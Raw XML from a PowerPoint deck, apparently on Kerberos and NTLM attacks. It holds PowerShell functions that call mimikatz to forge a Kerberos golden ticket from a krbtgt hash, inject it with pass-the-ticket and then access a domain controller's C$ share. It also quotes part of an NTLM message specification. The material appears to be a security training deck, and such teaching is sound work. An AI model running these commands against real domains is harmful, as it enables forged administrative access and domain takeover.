                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Path</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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /admin:</a:t>
            </a:r>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userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /domain:</a:t>
            </a:r>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domainFqdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>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domainSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>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ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /ticket:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>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exit</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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</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Import-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GoldenTicket</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Mandatory)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Path</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p>
          <a:p>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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>klist</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purge</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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>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exit</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</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\\kerbdc2\c$</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ComputerName</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KerbDC2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami.exe</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49"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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384871800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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251955629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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227732828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133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312261014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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236509377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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425752685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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133280636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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56892685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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223600028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139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272334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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3001569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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238589321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141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85674994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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131749782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143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375508482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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73235241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145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221015443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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41653784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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signature (8 bytes): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An 8-byte character array that MUST contain the ASCII string ('N', 'T', 'L', 'M', 'S', 'S', 'P', '\0').</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MessageType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (4 bytes): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A 32-bit unsigned integer that indicates the message type. This field MUST be set to 0x00000002.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetNameFields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (8 bytes): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the NTLMSSP_REQUEST_TARGET flag is not set in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NegotiateFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, indicating that no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is required:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetNameLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetNameMaxLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> SHOULD be set to zero on transmission.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
